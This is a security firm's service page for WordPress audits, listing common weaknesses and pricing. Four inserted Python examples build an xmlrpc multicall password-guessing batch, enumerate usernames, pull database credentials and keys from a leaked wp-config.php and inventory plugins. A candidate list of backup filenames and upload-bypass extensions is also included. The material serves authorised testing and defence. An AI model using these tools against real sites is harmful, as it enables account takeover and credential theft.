WordPress Security

WordPress Security Audit

40% of the web runs WordPress. Attackers know this.

Sherlock Forensics provides WordPress security audits covering plugin vulnerabilities, outdated core and themes, xmlrpc abuse, user enumeration via REST API (/wp-json/wp/v2/users), wp-config exposure, brute force on wp-login, directory listing on wp-content and file upload vulnerabilities. Quick audits from $1,500 CAD. Standard penetration tests from $5,000 CAD.

WordPress powers over 40% of all websites on the internet, making it the single most targeted platform by attackers. Automated bots scan for WordPress installations 24 hours a day, testing for vulnerable plugins, exposed configuration files, default admin credentials and xmlrpc abuse. The plugin ecosystem is both WordPress's greatest strength and its greatest weakness. Every plugin is a potential entry point, and most WordPress sites run dozens of them. We audit WordPress installations to find the vulnerabilities that automated scanners and security plugins miss.

What We Find

WordPress Vulnerabilities We Test For

01 - Plugins

Plugin Vulnerabilities

WordPress plugins are the most common entry point for site compromises. With over 60,000 plugins available, quality and security practices vary enormously. Popular plugins have had critical SQL injection, remote code execution, arbitrary file upload and authentication bypass vulnerabilities. Abandoned plugins never receive patches. We audit every plugin on your site against multiple vulnerability databases, test for known exploits, identify abandoned or end-of-life plugins and assess the attack surface each plugin introduces to your installation.

02 - Core

Outdated Core and Themes

Running an outdated WordPress core version or outdated themes exposes your site to every vulnerability patched since your last update. WordPress security updates frequently patch critical vulnerabilities including SQL injection, stored XSS, privilege escalation and remote code execution. Themes with vulnerable PHP files, outdated JavaScript libraries and unpatched template injection flaws compound the risk. We identify your exact WordPress version, compare it against known vulnerabilities and test for exploitable issues in every installed theme.

03 - XMLRPC

xmlrpc Abuse

WordPress's xmlrpc.php endpoint enables remote publishing, pingbacks and the mobile app. Attackers abuse it for password brute forcing through the system.multicall method, which packs hundreds of wp.getUsersBlogs login attempts into a single HTTP request, so lockout and rate-limiting plugins that only watch wp-login.php never see them. Since WordPress 4.4 the server rejects every further login in a multicall once one has failed, which blunts the amplification but still leaves an endpoint that will check passwords for as many separate requests as an attacker cares to send. pingback.ping makes the server fetch an attacker-supplied URL, which turns the site into a DDoS amplifier against third parties and into a server-side request forgery vector for probing hosts inside the network. We test xmlrpc accessibility, attempt credential brute forcing through multicall and assess pingback abuse potential.
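The following is an added example for this page, not Sherlock Forensics' tooling: it builds the system.multicall batch described above and reads a reply, including the WordPress 4.4+ behaviour where everything after the first failed login is rejected unchecked. The server reply is a constructed sample so the code runs offline; on a live target the output of build_multicall() would be POSTed to /xmlrpc.php with Content-Type: text/xml, and only with written authorisation.

```python
"""Build a system.multicall login batch for xmlrpc.php and read the reply.

Added example, not the company's tooling. sample_reply() is a constructed
server response, not captured from any real site.
"""
import xmlrpc.client
from typing import List, Tuple

Cred = Tuple[str, str]


def build_multicall(creds: List[Cred]) -> bytes:
    """One HTTP body carrying one wp.getUsersBlogs login attempt per pair.

    wp.getUsersBlogs takes (username, password) and needs no blog id, which
    is why it is the usual method for credential testing over XML-RPC.
    """
    calls = [{"methodName": "wp.getUsersBlogs", "params": [u, p]} for u, p in creds]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def parse_multicall(reply_xml: str, creds: List[Cred]) -> List[Tuple[str, str, bool, str]]:
    """Pair every result with the credential it answers.

    system.multicall returns one entry per call: a one-element array holding
    the method's result on success, or a struct with faultCode/faultString on
    failure. WordPress answers a bad login with fault 403 "Incorrect username
    or password."; since 4.4 it returns that same fault, without checking the
    password, for every call after the first failure in the batch.
    """
    (results,), _method = xmlrpc.client.loads(reply_xml)
    if len(results) != len(creds):
        raise ValueError("reply has %d results for %d calls" % (len(results), len(creds)))
    rows = []
    for (user, pw), res in zip(creds, results):
        if isinstance(res, dict) and "faultCode" in res:
            rows.append((user, pw, False, str(res.get("faultString", ""))))
        else:
            rows.append((user, pw, True, ""))
    return rows


def valid_credentials(reply_xml: str, creds: List[Cred]) -> List[Cred]:
    return [(u, p) for u, p, ok, _ in parse_multicall(reply_xml, creds) if ok]


def unverified_after_first_failure(reply_xml: str, creds: List[Cred]) -> List[Cred]:
    """Pairs a 4.4+ server never actually checked: everything after the first
    fault. If a success appears after a fault the server did check them
    (pre-4.4 behaviour) and nothing is returned. On 4.4+ these pairs have to
    be retried one per request."""
    rows = parse_multicall(reply_xml, creds)
    first_fail = next((i for i, r in enumerate(rows) if not r[2]), None)
    if first_fail is None:
        return []
    tail = rows[first_fail + 1:]
    if any(r[2] for r in tail):
        return []
    return [(u, p) for u, p, _ok, _ in tail]


def sample_reply(creds: List[Cred], valid_index: int) -> str:
    """Constructed server reply: the pair at valid_index succeeds with a
    wp.getUsersBlogs blog list, the rest get the 403 fault WordPress sends."""
    blogs = [{"blogid": "1", "blogName": "Example", "url": "https://example.test/",
              "xmlrpc": "https://example.test/xmlrpc.php", "isAdmin": True}]
    results = []
    for i in range(len(creds)):
        if i == valid_index:
            results.append([blogs])  # success: one-element array wrapping the result
        else:
            results.append({"faultCode": 403, "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((results,), methodresponse=True)


if __name__ == "__main__":
    batch = [("admin", "Winter2024!"), ("admin", "password"), ("editor", "letmein")]
    reply = sample_reply(batch, valid_index=0)
    print("request bytes for 3 logins:", len(build_multicall(batch)))
    print("valid:", valid_credentials(reply, batch))
    print("unchecked on 4.4+:", unverified_after_first_failure(reply, batch))
```

Because a 4.4+ server reports an unchecked pair with exactly the same 403 fault as a genuinely wrong one, a reply with a failure in position one tells you nothing about positions two onwards; the practical test is to send one pair per request and confirm the endpoint keeps answering, which is the gap a web-server block on xmlrpc.php closes and a wp-login lockout plugin does not.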

04 - Users

User Enumeration via REST API

WordPress's REST API at /wp-json/wp/v2/users answers unauthenticated requests with the id, display name and slug of every user who has published a post, and the slug is normally the login name. Combined with author archive scanning (?author=1, ?author=2, which redirects to /author/<slug>/ for an existing author) and the default wp-login.php error messages, which say whether a username is registered before the password is even checked, attackers can build a list of the accounts on your site without authentication. Our scanner automatically detects WordPress and checks for user enumeration. We test all enumeration vectors and verify that user information is properly restricted.
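The following is an added example for this page, not the company's scanner: it pulls usernames out of the three enumeration vectors just described and merges them. Every response body and header in it is a constructed sample so the code runs offline; against a live site the same functions would be fed what /wp-json/wp/v2/users, /?author=N and wp-login.php actually return.

```python
"""Merge WordPress user-enumeration vectors into one list of confirmed slugs.

Added example, not the company's tooling. REST_BODY, AUTHOR_PROBES and
LOGIN_PROBES are constructed samples, not captured from any real site.
"""
import json
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse


def users_from_rest(body: str) -> List[Dict[str, object]]:
    """id/slug/name from a /wp-json/wp/v2/users listing.

    'slug' is user_nicename, which WordPress derives from the login name
    unless the user changed it; 'name' is the display name. A hardened site
    returns an error object (not a list), which yields nothing here.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, list):
        return []
    return [{"id": u.get("id"), "slug": u["slug"], "name": u.get("name", "")}
            for u in data if isinstance(u, dict) and "slug" in u]


AUTHOR_PATH_RE = re.compile(r"/author/([^/?#]+)/?$")


def author_from_redirect(status: int, location: Optional[str]) -> Optional[str]:
    """/?author=N is redirected to /author/<slug>/ for an existing author;
    a 404 (or no Location header) gives that ID away to nobody."""
    if status not in (301, 302) or not location:
        return None
    m = AUTHOR_PATH_RE.search(urlparse(location).path)
    return m.group(1) if m else None


def classify_login_error(html: str) -> str:
    """Default wp-login.php wording confirms or denies a username before any
    password is checked; hardened sites replace both with one generic message."""
    text = re.sub(r"<[^>]+>", "", html)
    if "is not registered on this site" in text or "Invalid username" in text:
        return "unknown_user"
    if "The password you entered for the username" in text:
        return "valid_user"
    return "generic"


def enumerate_users(rest_body: str,
                    author_probes: Dict[int, Tuple[int, Optional[str]]],
                    login_probes: Dict[str, str]) -> List[str]:
    """Sorted union of every slug confirmed by any vector."""
    found = {str(u["slug"]) for u in users_from_rest(rest_body)}
    for status, location in author_probes.values():
        slug = author_from_redirect(status, location)
        if slug:
            found.add(slug)
    for username, html in login_probes.items():
        if classify_login_error(html) == "valid_user":
            found.add(username)
    return sorted(found)


# Constructed samples, not captured from any real site.
REST_BODY = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://example.test/author/admin/"},
    {"id": 3, "name": "Jane Editor", "slug": "jane", "link": "https://example.test/author/jane/"},
])
AUTHOR_PROBES = {1: (301, "https://example.test/author/admin/"),
                 2: (404, None),
                 3: (301, "https://example.test/author/jane/")}
LOGIN_PROBES = {
    "admin": "<div id=\"login_error\"><strong>Error:</strong> The password you entered for "
             "the username <strong>admin</strong> is incorrect.</div>",
    "bob": "<div id=\"login_error\"><strong>Error:</strong> The username <strong>bob</strong> "
           "is not registered on this site. If you are unsure of your username, try your "
           "email address instead.</div>",
    "dave": "<div id=\"login_error\"><strong>Error:</strong> Invalid login.</div>",
}

if __name__ == "__main__":
    print(enumerate_users(REST_BODY, AUTHOR_PROBES, LOGIN_PROBES))
```

A site where all three vectors are closed gives an empty list: the users endpoint returns an error object instead of an array, ?author=N answers 404 without a redirect, and wp-login.php uses the same wording whether or not the username exists.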

05 - Config

wp-config Exposure

wp-config.php contains your database credentials, authentication keys, salts, table prefix and debug settings. When the web server is misconfigured, PHP processing fails (the file is then served as plain text), or backup and editor artefacts exist (wp-config.php.bak, wp-config.old, wp-config.php~, .wp-config.php.swp), these secrets become directly readable. Exposed database credentials allow direct database access if the database server is reachable. Exposed authentication keys and salts, combined with the password hashes from that database, let an attacker forge a valid login cookie for any account. We test for wp-config accessibility through multiple vectors including direct requests, backup extensions and server misconfiguration.
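The following is an added example for this page, not the company's tooling: it separates a genuine wp-config.php leak from a harmless 200 (a correctly processed wp-config.php returns an empty body) and pulls out what the leak hands an attacker. The bodies are constructed samples so it runs offline; CANDIDATE_PATHS lists the names a tester would request, the first two from the page, the rest common backup and editor artefacts.

```python
"""Detect a served-as-text wp-config.php and extract what it gives away.

Added example, not the company's tooling. SAMPLE_LEAK is a constructed file,
not taken from any real site.
"""
import re
from typing import Dict

CANDIDATE_PATHS = [
    "wp-config.php.bak", "wp-config.old", "wp-config.php.old", "wp-config.php~",
    "wp-config.php.save", "wp-config.php.orig", "wp-config.txt", ".wp-config.php.swp",
    "wp-config.php",  # served as text only when PHP handling is broken
]

DB_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")
AUTH_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")

# define( 'NAME', 'value' ); with either quote style and backslash escapes inside
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](\w+)['"]\s*,\s*(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)")\s*\)""")
DEBUG_RE = re.compile(r"""define\s*\(\s*['"]WP_DEBUG['"]\s*,\s*(true|false)""", re.I)
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*['"]([^'"]*)['"]""")


def is_php_source_leak(body: str) -> bool:
    """wp-config.php only defines constants, so a correctly processed request
    returns an empty body; PHP source containing DB_PASSWORD means the file
    was served as text."""
    return "<?php" in body and "DB_PASSWORD" in body


def extract_config(body: str) -> Dict[str, str]:
    found: Dict[str, str] = {}
    for m in DEFINE_RE.finditer(body):
        name = m.group(1)
        if name in DB_KEYS or name in AUTH_KEYS:
            if m.group(2) is not None:
                # PHP single-quoted string: only \' and \\ are escapes
                found[name] = re.sub(r"\\(['\\])", r"\1", m.group(2))
            else:
                found[name] = m.group(3)
    dm = DEBUG_RE.search(body)
    if dm:
        found["WP_DEBUG"] = dm.group(1).lower()
    pm = PREFIX_RE.search(body)
    if pm:
        found["table_prefix"] = pm.group(1)
    return found


def assess(path: str, status: int, body: str) -> Dict[str, object]:
    """Summarise one probe: whether it leaked, whether a full set of database
    credentials is present, how many of the eight keys/salts leaked, and
    whether debug output is on."""
    leaked = status == 200 and is_php_source_leak(body)
    cfg = extract_config(body) if leaked else {}
    return {
        "path": path,
        "leaked": leaked,
        "db_credentials": all(k in cfg for k in DB_KEYS),
        "auth_keys": sum(1 for k in AUTH_KEYS if k in cfg),
        "debug_enabled": cfg.get("WP_DEBUG") == "true",
        "table_prefix": cfg.get("table_prefix"),
    }


# Constructed sample of a leaked file (not a real configuration).
SAMPLE_LEAK = r"""<?php
define( 'DB_NAME', 'wp_shop' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'S3cret\'pass' );
define( 'DB_HOST', 'db.internal:3306' );
define( 'AUTH_KEY',         'k1' );
define( 'SECURE_AUTH_KEY',  'k2' );
define( 'LOGGED_IN_KEY',    'k3' );
define( 'NONCE_KEY',        'k4' );
define( 'AUTH_SALT',        's1' );
define( 'SECURE_AUTH_SALT', 's2' );
define( 'LOGGED_IN_SALT',   's3' );
define( 'NONCE_SALT',       's4' );
$table_prefix = 'shop_';
define( 'WP_DEBUG', true );
require_once ABSPATH . 'wp-settings.php';
"""

if __name__ == "__main__":
    print(assess("wp-config.php.bak", 200, SAMPLE_LEAK))
    print(assess("wp-config.php", 200, ""))  # processed normally: empty body, no leak
```

The status code alone is not the signal: wp-config.php itself legitimately answers 200 with nothing in it, and a backup name may return a 200 soft-404 page, so the check is for PHP source with the DB constants in the body.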

06 - Brute

Brute Force on wp-login

The wp-login.php page is one of the most attacked endpoints on the internet. Automated bots attempt thousands of username and password combinations daily against every WordPress site they find. Without rate limiting, account lockout, CAPTCHA or IP blocking, these attacks eventually succeed against weak passwords. We test your login security including rate limiting effectiveness, account lockout thresholds, CAPTCHA implementation, two-factor authentication and whether the login page reveals valid usernames through error messages.

07 - Directory

Directory Listing on wp-content

When directory listing is enabled on wp-content, wp-content/uploads, wp-content/plugins and wp-content/themes, attackers can browse your entire file structure. This reveals installed plugin names for vulnerability matching (with versions usually one request away in each plugin's readme.txt), uploaded file paths, backup files, configuration files and any sensitive documents stored in the uploads directory. We test directory listing across all WordPress directories and check for sensitive files that should not be publicly accessible.

08 - Upload

File Upload Vulnerabilities

WordPress and its plugins handle file uploads for media, forms, imports and backups. Vulnerable upload handling allows attackers to upload PHP shells that provide full server control, bypass file type restrictions through extension tricks (shell.php.jpg, .phtml, .phar, mixed case), overwrite existing files through path traversal and store malicious files that get executed by the web server. We test every file upload mechanism on your site for extension bypass, MIME type spoofing, size limits, path traversal and execution of uploaded files.

Our Approach

How We Audit WordPress Sites

Plugin and Theme Inventory

We enumerate every installed plugin and theme including active and inactive installations. We check each one against multiple vulnerability databases, identify version numbers (normally from each plugin's readme.txt Stable tag or main file header), flag abandoned or end-of-life components and assess the attack surface each adds to your site. Inactive plugins that remain on the server are still exploitable, because their PHP files can be requested directly, and they are frequently overlooked.
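The following is an added example for this page, not the company's tooling, covering both the directory-listing finding above and the inventory step here: it turns an exposed /wp-content/plugins/ listing into a plugin inventory with versions read from each readme.txt, and flags anything below a known-fixed version. The listing and readme texts are constructed samples so the code runs offline; MINIMUM_SAFE is a placeholder for the "fixed in" data you would pull from a vulnerability database and does not describe any real plugin.

```python
"""Plugin inventory from an exposed directory listing plus readme.txt files.

Added example, not the company's tooling. LISTING, READMES and MINIMUM_SAFE
are constructed samples; the plugin names are made up.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple


class _ListingLinks(HTMLParser):
    """Collects hrefs from an Apache or nginx autoindex page."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def is_directory_listing(html: str) -> bool:
    return re.search(r"<title>\s*Index of /", html, re.I) is not None


def plugin_dirs_from_listing(html: str) -> List[str]:
    """Subdirectory names from the listing; parent links (/... or ../) and
    Apache's sort links (?C=N;O=D) are skipped. Inactive plugins appear too,
    because they are still on disk."""
    if not is_directory_listing(html):
        return []
    parser = _ListingLinks()
    parser.feed(html)
    return [h.rstrip("/") for h in parser.hrefs
            if h.endswith("/") and not h.startswith(("/", "?", "."))]


STABLE_TAG_RE = re.compile(r"^\s*Stable tag:\s*(\S+)", re.I | re.M)


def version_from_readme(readme: str) -> Optional[str]:
    """The Stable tag header of a plugin's readme.txt; 'trunk' carries no version."""
    m = STABLE_TAG_RE.search(readme)
    if not m or m.group(1).lower() == "trunk":
        return None
    return m.group(1)


def version_tuple(v: str) -> Tuple[int, ...]:
    return tuple(int(x) if x.isdigit() else 0 for x in v.split("."))


def is_older(installed: str, fixed_in: str) -> bool:
    """Numeric, component-wise comparison so 1.10.0 is newer than 1.9.9."""
    a, b = version_tuple(installed), version_tuple(fixed_in)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def inventory(listing_html: str, readmes: Dict[str, str],
              minimum_safe: Dict[str, str]) -> List[Dict[str, object]]:
    rows = []
    for name in plugin_dirs_from_listing(listing_html):
        version = version_from_readme(readmes.get(name, ""))
        fixed = minimum_safe.get(name)
        rows.append({
            "plugin": name,
            "version": version,
            "outdated": bool(version and fixed and is_older(version, fixed)),
            "unknown_version": version is None,
        })
    return rows


# Constructed samples (Apache-style listing, three readmes), not from a real site.
LISTING = """<html><head><title>Index of /wp-content/plugins</title></head><body>
<h1>Index of /wp-content/plugins</h1><ul>
<li><a href="/wp-content/">Parent Directory</a></li>
<li><a href="?C=N;O=D">Name</a></li>
<li><a href="example-forms/">example-forms/</a></li>
<li><a href="example-gallery/">example-gallery/</a></li>
<li><a href="example-backup/">example-backup/</a></li>
<li><a href="index.php">index.php</a></li>
</ul></body></html>"""
READMES = {
    "example-forms": "=== Example Forms ===\nRequires at least: 5.8\nStable tag: 3.1.0\n",
    "example-gallery": "=== Example Gallery ===\nStable tag: 1.4.2\n",
    "example-backup": "=== Example Backup ===\nStable tag: trunk\n",
}
MINIMUM_SAFE = {"example-gallery": "2.0.0"}  # placeholder, not a real advisory

if __name__ == "__main__":
    for row in inventory(LISTING, READMES, MINIMUM_SAFE):
        print(row)
```

A plugin whose readme says Stable tag: trunk, or whose readme is blocked, is reported as unknown_version rather than silently passed, since an inventory that cannot establish a version cannot clear the plugin either.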

Configuration and Hardening Review

We review your WordPress configuration including wp-config.php settings, file permissions, directory listing, web server configuration, PHP settings, SSL/TLS implementation and security headers. We verify that debug mode is disabled, that configuration files are inaccessible and that your hosting environment follows WordPress hardening best practices.

Authentication and Access Control

We test login security, user enumeration vectors, xmlrpc brute force potential, REST API exposure, role-based access control, admin panel protection and session management. We verify that administrator accounts use strong credentials, that login rate limiting is effective and that user enumeration is blocked across all vectors including the REST API and author archives.

Malware and Backdoor Scanning

We scan your WordPress installation for existing compromises including injected PHP backdoors, modified core files, malicious plugins, SEO spam injection, redirect chains and hidden admin accounts. Many WordPress sites are already compromised without the owner knowing. We identify active infections and the entry points attackers used to gain access.

Pricing

WordPress Security Engagements

Quick Audit - $1,500 CAD
Focused security review covering plugin vulnerability assessment, core version check, user enumeration, xmlrpc testing, wp-config exposure, login security and common misconfigurations. Ideal for business websites and blogs. Delivered in 3-5 business days. Order online.
Standard Penetration Test - $5,000 CAD
Full penetration test covering all plugins, themes, custom code, REST API, file uploads, server configuration and malware scanning. For WordPress sites with e-commerce, membership areas or custom plugin development. Order online.
Comprehensive Assessment - $12,000 CAD
Full-scope assessment including source code review of custom plugins and themes, server infrastructure testing, hosting configuration audit, malware forensics and ongoing monitoring recommendations. For enterprise WordPress deployments. Contact us to scope.

Frequently Asked Questions

WordPress Security FAQs

Is WordPress secure?
WordPress core is maintained by a dedicated security team and receives regular updates. However, the vast majority of WordPress compromises come from vulnerable plugins, outdated themes, weak credentials and server misconfigurations. The plugin ecosystem introduces enormous attack surface that WordPress core cannot control. Most WordPress sites we audit have at least one critical vulnerability, usually in a plugin.
How do I find WordPress vulnerabilities?
A professional WordPress security audit checks your core version, every plugin and theme against vulnerability databases, tests login security, checks xmlrpc exposure, verifies wp-config protection and scans for existing compromises. You can start with our free scanner at sherlockforensics.com/pages/hack-your-own-website.html which automatically detects WordPress sites and checks for user enumeration. For a thorough assessment, our quick audits start at $1,500 CAD.
Are WordPress plugins safe?
Plugin security varies enormously. Well-maintained plugins from established developers receive regular security updates, but many plugins are abandoned, poorly coded or have never had a security review. Even popular plugins with millions of installations have had critical vulnerabilities. Only install plugins you actually need, choose plugins with active maintenance, check vulnerability databases before installing and remove plugins you no longer use.
Should I disable xmlrpc.php?
Yes, unless you specifically need it for Jetpack, the WordPress mobile app or XML-RPC publishing. xmlrpc.php enables brute force attacks that bypass login page protections, DDoS amplification through pingback abuse and batched credential testing via system.multicall. Block access in your web server configuration or .htaccess so requests never reach PHP. Partial fixes leave a vector open: security plugins that only disable pingbacks leave the brute force methods reachable, and WordPress's own xmlrpc_enabled filter only turns off the methods that require authentication, so pingback.ping keeps working.
How much does a WordPress security audit cost?
Sherlock Forensics offers WordPress security audits starting at $1,500 CAD for a quick audit covering plugin assessment, core security, login hardening and common misconfigurations. Standard penetration tests for larger WordPress sites with custom development start at $5,000 CAD. Comprehensive assessments with source code review and infrastructure testing start at $12,000 CAD. All engagements include a detailed report with prioritized remediation guidance.

Get Started

Find out what attackers already know about your WordPress site.

Quick audits from $1,500 CAD. Standard penetration tests from $5,000 CAD.

Order Online

Secure Your WordPress Site

Tell us about your WordPress installation, how many plugins you run and your biggest security concerns. We will recommend the right assessment for your site.

Call 604.229.1994
Phone
604.229.1994
Burnaby Office
Burnaby, BC, Canada
Coquitlam Office
Coquitlam, BC, Canada